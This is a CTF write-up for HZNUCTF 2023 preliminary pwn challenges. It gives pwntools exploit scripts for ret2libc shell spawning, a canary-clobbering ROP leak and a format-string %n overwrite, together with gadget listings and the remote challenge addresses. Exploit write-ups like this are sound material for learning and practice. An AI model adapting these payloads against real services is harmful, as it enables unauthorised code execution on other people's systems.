HZNUCTF 2023 preliminary 复现

sign_in:
ret2libc
exp:

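from pwn import *

# sign_in: two-stage ret2libc.
#   stage 1 - puts(puts@got) leaks a libc address, then return into vuln for
#             a second overflow;
#   stage 2 - system("/bin/sh") with a spare `ret` to keep rsp 16-byte aligned.
context(log_level='debug', arch='amd64', os='linux', terminal=['tmux', 'splitw', '-h'])

elf = ELF("./sign_in")
libc = ELF("./libc.so")  # must be the libc the remote actually runs; the offsets below come from it
# Remote is the default (as in the original); `python exp.py LOCAL` runs the
# binary in-process instead of editing the connect line by hand.
if args.LOCAL:
    io = process("./sign_in")
else:
    io = remote("43.143.7.127", 28649)

# Gadget addresses come from the ROPgadget listing below (no PIE).
pop_rdi_ret = 0x401283
vuln = 0x4011db          # overflowing function; re-entered after the leak
ret = 0x40101a           # lone `ret`: realigns the stack before system() (movaps)
padding = cyclic(0x48)   # distance from the buffer to the saved return address

# ---- stage 1: leak puts@libc ----
io.recvuntil(b"here~\n")
payload = padding + p64(pop_rdi_ret) + p64(elf.got["puts"]) + p64(elf.plt["puts"]) + p64(vuln)
io.sendline(payload)
# puts emits the 6 significant bytes of a userland pointer (top byte 0x7f); zero-extend to 8.
leak_addr = u64(io.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))
print(f"leak_addr:  {leak_addr:#x}")
libc_addr = leak_addr - libc.sym["puts"]
print(f"libc_addr:  {libc_addr:#x}")
# A libc base is page-aligned; anything else means a wrong libc.so or a mis-parsed leak.
if libc_addr & 0xfff:
    log.warning("libc base %#x is not page-aligned: wrong libc.so or bad leak?", libc_addr)
sys_addr = libc_addr + libc.sym["system"]
str_bin_sh = libc_addr + next(libc.search(b"/bin/sh"))

# ---- stage 2: system("/bin/sh") ----
io.recvuntil(b"here~\n")
payload = padding + p64(ret) + p64(pop_rdi_ret) + p64(str_bin_sh) + p64(sys_addr)
io.sendline(payload)

io.interactive()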


# Gadgets information
# ============================================================
# 0x000000000040127c : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x000000000040127e : pop r13 ; pop r14 ; pop r15 ; ret
# 0x0000000000401280 : pop r14 ; pop r15 ; ret
# 0x0000000000401282 : pop r15 ; ret
# 0x000000000040127b : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x000000000040127f : pop rbp ; pop r14 ; pop r15 ; ret
# 0x000000000040115d : pop rbp ; ret
# 0x0000000000401283 : pop rdi ; ret
# 0x0000000000401281 : pop rsi ; pop r15 ; ret
# 0x000000000040127d : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x000000000040101a : ret

# Unique gadgets found: 11



check_in:
栈溢出后用超长填充覆盖 canary（exp 末尾的 0xf00 字节填充即为此用），再 ROP 调用 puts(bss) 打印目标数据
exp:

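from pwn import *

# check_in: stack overflow in a canary-protected function.  The ROP chain is
# just puts(bss_addr); the unusually long trailing filler is what lets the
# epilogue's canary check pass (see the comment on the payload).
context(log_level='debug', arch='amd64', os='linux', terminal=['tmux', 'splitw', '-h'])

BINARY = "./[HZNUCTF 2023 preliminary]checkin_pwn"
elf = ELF(BINARY)
# Remote is the default (as in the original); `python exp.py LOCAL` runs the binary in-process.
if args.LOCAL:
    io = process(BINARY)
else:
    io = remote("43.143.7.97", 28127)

bss_addr = 0x4040C0      # .bss buffer that puts() will dump — presumably where the target data is read; confirm in the binary
pop_rdi_ret = 0x401483   # from the gadget listing below (no PIE)

io.recvuntil(b"checkin\n")
# 0x28 bytes of 'a' run from the buffer up to the saved return address, so the
# canary slot in between is clobbered with 'aaaaaaaa' as well.  The chain can
# therefore only execute if the reference canary the epilogue compares against
# has become 'aaaaaaaa' too: that is the job of the 0xf00 bytes of filler
# after the chain (NOTE(review): this works when the copy lives above the
# overflowed stack, e.g. TLS at the top of a pthread stack — confirm against
# the binary).  Nothing follows puts@plt, so the process crashes after the
# print; the output has already been flushed by then.
payload = b"a" * 0x28 + p64(pop_rdi_ret) + p64(bss_addr) + p64(elf.plt["puts"]) + b"a" * 0xf00
io.sendline(payload)

io.interactive()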

# Gadgets information
# ============================================================
# 0x000000000040147c : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x000000000040147e : pop r13 ; pop r14 ; pop r15 ; ret
# 0x0000000000401480 : pop r14 ; pop r15 ; ret
# 0x0000000000401482 : pop r15 ; ret
# 0x000000000040147b : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x000000000040147f : pop rbp ; pop r14 ; pop r15 ; ret
# 0x000000000040121d : pop rbp ; ret
# 0x0000000000401483 : pop rdi ; ret
# 0x0000000000401481 : pop rsi ; pop r15 ; ret
# 0x000000000040147d : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x000000000040101a : ret

# Unique gadgets found: 11




ffmt
格式化字符串
输入长度受限，无法直接用 fmtstr_payload 整段劫持 printf 的 GOT 表项
改用 %.Nd 控制已输出字符数、再以 %n 把 backdoor 地址写到栈上（rbp-0x10）；注意实际写入的值并非 backdoor 起始地址，而是其后几个字节（见 exp 中的注释）
exp:

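from pwn import *

# ffmt: format-string bug with a short input limit, so a full
# fmtstr_payload() GOT overwrite does not fit.  Instead a single %n stores the
# backdoor address (as a printed-character count) into a stack slot at rbp-0x10.
context(log_level='debug', arch='amd64', os='linux', terminal=['tmux', 'splitw', '-h'])

elf = ELF("./ffmt")
# Remote is the default (as in the original); `python exp.py LOCAL` runs the binary in-process.
if args.LOCAL:
    io = process("./ffmt")
else:
    io = remote("43.142.108.3", 28843)

shell = 0x40121b                 # backdoor function entry
printf_got = elf.got["printf"]   # only needed for the fmtstr_payload variant kept below

# First input goes straight through printf: "%p" prints a stack pointer (the saved rbp).
io.sendlineafter(b"name: \n", b"%p")
# recv(14) == "0x" + 12 hex digits, i.e. assumes a 6-byte (0x7f..) pointer; a
# shorter value would leave bytes unread and corrupt the int() parse.
addr = int(io.recv(14), 16)
print(f"addr:  {addr:#x}")

io.recvuntil(b"yourself~\n")
# Does not fit the input limit, hence the hand-built write:
# payload = fmtstr_payload(8, {printf_got: shell})
#
# Layout: 2 filler bytes + the 14-byte format = 16 bytes, so the p64 target sits
# on an 8-byte boundary two slots after the start of the buffer -> positional
# argument 8 (presumably the buffer itself is argument 6).  %n stores the
# number of characters printed so far into *(addr-0x10):
#   2 + 4198945 = 0x401223  (one more if the %d argument prints a '-' sign)
# which is a few bytes past `shell` (0x40121b); the writeup notes 0x401221.
# NOTE(review): if the target ever changes, re-derive the precision from the
# exact entry you want rather than reusing this constant.  Expect ~4 MB of
# output from the remote before the shell comes back.
write_target = addr - 0x10
payload = b"a" * 2 + b"%.4198945d%8$n" + p64(write_target)
# gdb.attach(io)
# pause()
io.sendline(payload)

io.interactive()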




shell:
逆向稍微有点复杂：先输入 `>` 进入子函数，空格分隔符后的字符满足 <= \x1f 或 >= 'z'（exp 中用的是 `{`）即可到达存在栈溢出的输入点，然后做 ret2libc
exp:

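from pwn import *

# shell: a small command parser.  "> {" routes to the handler containing the
# overflowing read (the byte after the separator must be <= 0x1f or >= 'z';
# '{' is 0x7b).  From there it is the same two-stage ret2libc as sign_in.
context(log_level='debug', arch='amd64', os='linux', terminal=['tmux', 'splitw', '-h'])

elf = ELF("./shell")
libc = ELF("./libc.so")  # must match the remote libc; all offsets below come from it
# Remote is the default (as in the original); `python exp.py LOCAL` runs the binary in-process.
if args.LOCAL:
    io = process("./shell")
else:
    io = remote("43.143.7.97", 28569)

pop_rdi_ret = 0x401d13   # from the gadget listing below (no PIE)
puts_plt = elf.plt["puts"]
puts_got = elf.got["puts"]
vuln = 0x401c34          # overflowing handler; re-entered after the leak
ret = 0x40101a           # lone `ret`: realigns the stack before system() (movaps)
padding = cyclic(0x68)   # distance from the buffer to the saved return address


def reach_vuln():
    """Drive the menu to the overflowing read and wait for its prompt."""
    io.recvuntil(b"[haha]$")
    io.sendline(b"> {")
    io.recvuntil(b"name:")


# ---- stage 1: leak puts@libc, return into vuln ----
reach_vuln()
io.sendline(padding + p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(vuln))
# puts emits the 6 significant bytes of a userland pointer (top byte 0x7f); zero-extend to 8.
puts_addr = u64(io.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))
libc_base = puts_addr - libc.sym["puts"]
print(f"libc_base:  {libc_base:#x}")
# A libc base is page-aligned; anything else means a wrong libc.so or a mis-parsed leak.
if libc_base & 0xfff:
    log.warning("libc base %#x is not page-aligned: wrong libc.so or bad leak?", libc_base)
sys_addr = libc_base + libc.sym["system"]
str_bin_sh = libc_base + next(libc.search(b"/bin/sh"))

# gdb.attach(io)
# pause()

# ---- stage 2: system("/bin/sh") ----
reach_vuln()
io.sendline(padding + p64(ret) + p64(pop_rdi_ret) + p64(str_bin_sh) + p64(sys_addr))
io.sendline(b"cat flag")
io.interactive()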


# Gadgets information
# ============================================================
# 0x0000000000401d0c : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x0000000000401d0e : pop r13 ; pop r14 ; pop r15 ; ret
# 0x0000000000401d10 : pop r14 ; pop r15 ; ret
# 0x0000000000401d12 : pop r15 ; ret
# 0x0000000000401d0b : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x0000000000401d0f : pop rbp ; pop r14 ; pop r15 ; ret
# 0x000000000040141d : pop rbp ; ret
# 0x0000000000401a77 : pop rbx ; pop rbp ; ret
# 0x0000000000401d13 : pop rdi ; ret
# 0x0000000000401d11 : pop rsi ; pop r15 ; ret
# 0x0000000000401d0d : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x000000000040101a : ret
# 0x0000000000401855 : ret 0x45c7
# 0x0000000000401593 : ret 0x8d48

# Unique gadgets found: 14